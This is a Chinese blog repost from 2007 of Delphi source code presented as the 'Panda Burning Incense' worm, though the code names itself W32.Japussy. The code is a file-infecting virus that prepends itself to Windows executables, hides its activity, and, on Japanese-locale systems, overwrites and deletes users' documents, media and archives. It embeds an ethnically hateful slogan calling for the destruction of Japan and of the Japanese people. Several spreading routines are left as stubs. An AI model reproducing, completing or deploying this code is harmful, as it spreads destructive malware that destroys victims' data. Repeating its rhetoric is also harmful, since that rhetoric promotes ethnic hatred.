标题:【转】传说中的熊猫烧香 出处:Felix021 时间:Sat, 08 Dec 2007 12:38:47 +0000 作者:felix021 地址:https://www.felix021.com/blog/read.php?478 内容: from http://hi.baidu.com/ftw118/blog/item/1d4904d70456c8dca144df8c.html 传说中的熊猫烧香源代码 program japussy; uses windows, sysutils, classes, graphics, shellapi{, registry}; const headersize = 82432; //病毒体的大小 iconoffset = $12eb8; //pe文件主图标的偏移量 //在我的delphi5 sp1上面编译得到的大小,其它版本的delphi可能不同 //查找2800000020的十六进制字符串可以找到主图标的偏移量 { headersize = 38912; //upx压缩过病毒体的大小 iconoffset = $92bc; //upx压缩过pe文件主图标的偏移量 //upx 1.24w 用法: upx -9 --8086 japussy.exe } iconsize = $2e8; //pe文件主图标的大小--744字节 icontail = iconoffset + iconsize; //pe文件主图标的尾部 id = $44444444; //感染标记 //垃圾码,以备写入 catchword = 'if a race need to be killed out, it must be yamato. ' + 'if a country need to be destroyed, it must be japan! ' + '*** w32.japussy.worm.a ***'; {$r *.res} function registerserviceprocess(dwprocessid, dwtype: integer): integer; stdcall; external 'kernel32.dll'; //函数声明 var tmpfile: string; si: startupinfo; pi: process_information; isjap: boolean = false; //日文操作系统标记 { 判断是否为win9x } function iswin9x: boolean; var ver: tosversioninfo; begin result := false; ver.dwosversioninfosize := sizeof(tosversioninfo); if not getversionex(ver) then exit; if (ver.dwplatformid = ver_platform_win32_windows) then //win9x result := true; end; { 在流之间复制 } procedure copystream(src: tstream; sstartpos: integer; dst: tstream; dstartpos: integer; count: integer); var scurpos, dcurpos: integer; begin scurpos := src.position; dcurpos := dst.position; src.seek(sstartpos, 0); dst.seek(dstartpos, 0); dst.copyfrom(src, count); src.seek(scurpos, 0); dst.seek(dcurpos, 0); end; { 将宿主文件从已感染的pe文件中分离出来,以备使用 } procedure extractfile(filename: string); var sstream, dstream: tfilestream; begin try sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone); try dstream := tfilestream.create(filename, fmcreate); try sstream.seek(headersize, 0); //跳过头部的病毒部分 dstream.copyfrom(sstream, sstream.size - headersize); finally dstream.free; end; finally sstream.free; end; except end; end; { 填充startupinfo结构 } procedure fillstartupinfo(var si: startupinfo; state: word); begin si.cb := sizeof(si); si.lpreserved := nil; si.lpdesktop := nil; si.lptitle := nil; si.dwflags := startf_useshowwindow; si.wshowwindow := state; si.cbreserved2 := 0; si.lpreserved2 := nil; end; { 发带毒邮件 } procedure sendmail; begin //哪位仁兄愿意完成之? end; { 感染pe文件 } procedure infectonefile(filename: string); var hdrstream, srcstream: tfilestream; icostream, dststream: tmemorystream; iid: longint; aicon: ticon; infected, ispe: boolean; i: integer; buf: array[0..1] of char; begin try //出错则文件正在被使用,退出 if comparetext(filename, 'japussy.exe') = 0 then //是自己则不感染 exit; infected := false; ispe := false; srcstream := tfilestream.create(filename, fmopenread); try for i := 0 to $108 do //检查pe文件头 begin srcstream.seek(i, sofrombeginning); srcstream.read(buf, 2); if (buf[0] = #80) and (buf[1] = #69) then //pe标记 begin ispe := true; //是pe文件 break; end; end; srcstream.seek(-4, sofromend); //检查感染标记 srcstream.read(iid, 4); if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染 infected := true; finally srcstream.free; end; if infected or (not ispe) then //如果感染过了或不是pe文件则退出 exit; icostream := tmemorystream.create; dststream := tmemorystream.create; try aicon := ticon.create; try //得到被感染文件的主图标(744字节),存入流 aicon.releasehandle; aicon.handle := extracticon(hinstance, pchar(filename), 0); aicon.savetostream(icostream); finally aicon.free; end; srcstream := tfilestream.create(filename, fmopenread); //头文件 hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone); try //写入病毒体主图标之前的数据 copystream(hdrstream, 0, dststream, 0, iconoffset); //写入目前程序的主图标 copystream(icostream, 22, dststream, iconoffset, iconsize); //写入病毒体主图标到病毒体尾部之间的数据 copystream(hdrstream, icontail, dststream, icontail, headersize - icontail); //写入宿主程序 copystream(srcstream, 0, dststream, headersize, srcstream.size); //写入已感染的标记 dststream.seek(0, 2); iid := $44444444; dststream.write(iid, 4); finally hdrstream.free; end; finally srcstream.free; icostream.free; dststream.savetofile(filename); //替换宿主文件 dststream.free; end; except; end; end; { 将目标文件写入垃圾码后删除 } procedure smashfile(filename: string); var filehandle: integer; i, size, mass, max, len: integer; begin try setfileattributes(pchar(filename), 0); //去掉只读属性 filehandle := fileopen(filename, fmopenwrite); //打开文件 try size := getfilesize(filehandle, nil); //文件大小 i := 0; randomize; max := random(15); //写入垃圾码的随机次数 if max < 5 then max := 5; mass := size div max; //每个间隔块的大小 len := length(catchword); while i < max do begin fileseek(filehandle, i * mass, 0); //定位 //写入垃圾码,将文件彻底破坏掉 filewrite(filehandle, catchword, len); inc(i); end; finally fileclose(filehandle); //关闭文件 end; deletefile(pchar(filename)); //删除之 except end; end; { 获得可写的驱动器列表 } function getdrives: string; var disktype: word; d: char; str: string; i: integer; begin for i := 0 to 25 do //遍历26个字母 begin d := chr(i + 65); str := d + ':\'; disktype := getdrivetype(pchar(str)); //得到本地磁盘和网络盘 if (disktype = drive_fixed) or (disktype = drive_remote) then result := result + d; end; end; { 遍历目录,感染和摧毁文件 } procedure loopfiles(path, mask: string); var i, count: integer; fn, ext: string; subdir: tstrings; searchrec: tsearchrec; msg: tmsg; function isvaliddir(searchrec: tsearchrec): integer; begin if (searchrec.attr <> 16) and (searchrec.name <> '.') and (searchrec.name <> '..') then result := 0 //不是目录 else if (searchrec.attr = 16) and (searchrec.name <> '.') and (searchrec.name <> '..') then result := 1 //不是根目录 else result := 2; //是根目录 end; begin if (findfirst(path + mask, faanyfile, searchrec) = 0) then begin repeat peekmessage(msg, 0, 0, 0, pm_remove); //调整消息队列,避免引起怀疑 if isvaliddir(searchrec) = 0 then begin fn := path + searchrec.name; ext := uppercase(extractfileext(fn)); if (ext = '.exe') or (ext = '.scr') then begin infectonefile(fn); //感染可执行文件 end else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then begin //感染html和asp文件,将base64编码后的病毒写入 //感染浏览此网页的所有用户 //哪位大兄弟愿意完成之? end else if ext = '.wab' then //outlook地址簿文件 begin //获取outlook邮件地址 end else if ext = '.adc' then //foxmail地址自动完成文件 begin //获取foxmail邮件地址 end else if ext = 'ind' then //foxmail地址簿文件 begin //获取foxmail邮件地址 end else begin if isjap then //是倭文操作系统 begin if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or (ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or (ext = '.wma') or (ext = '.zip') or (ext = '.rar') or (ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or (ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or (ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then smashfile(fn); //摧毁文件 end; end; end; //感染或删除一个文件后睡眠200毫秒,避免cpu占用率过高引起怀疑 sleep(200); until (findnext(searchrec) <> 0); end; findclose(searchrec); subdir := tstringlist.create; if (findfirst(path + '*.*', fadirectory, searchrec) = 0) then begin repeat if isvaliddir(searchrec) = 1 then subdir.add(searchrec.name); until (findnext(searchrec) <> 0); end; findclose(searchrec); count := subdir.count - 1; for i := 0 to count do loopfiles(path + subdir.strings + '\', mask); freeandnil(subdir); end; { 遍历磁盘上所有的文件 } procedure infectfiles; var driverlist: string; i, len: integer; begin if getacp = 932 then //日文操作系统 isjap := true; //去死吧! driverlist := getdrives; //得到可写的磁盘列表 len := length(driverlist); while true do //死循环 begin for i := len downto 1 do //遍历每个磁盘驱动器 loopfiles(driverlist + ':\', '*.*'); //感染之 sendmail; //发带毒邮件 sleep(1000 * 60 * 5); //睡眠5分钟 end; end; { 主程序开始 } begin if iswin9x then //是win9x registerserviceprocess(getcurrentprocessid, 1) //注册为服务进程 else //winnt begin //远程线程映射到explorer进程 //哪位兄台愿意完成之? end; //如果是原始病毒体自己 if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then infectfiles //感染和发邮件 else //已寄生于宿主程序上了,开始工作 begin tmpfile := paramstr(0); //创建临时文件 delete(tmpfile, length(tmpfile) - 4, 4); tmpfile := tmpfile + #32 + '.exe'; //真正的宿主文件,多一个空格 extractfile(tmpfile); //分离之 fillstartupinfo(si, sw_showdefault); createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true, 0, nil, '.', si, pi); //创建新进程运行之 infectfiles; //感染和发邮件 end; end. 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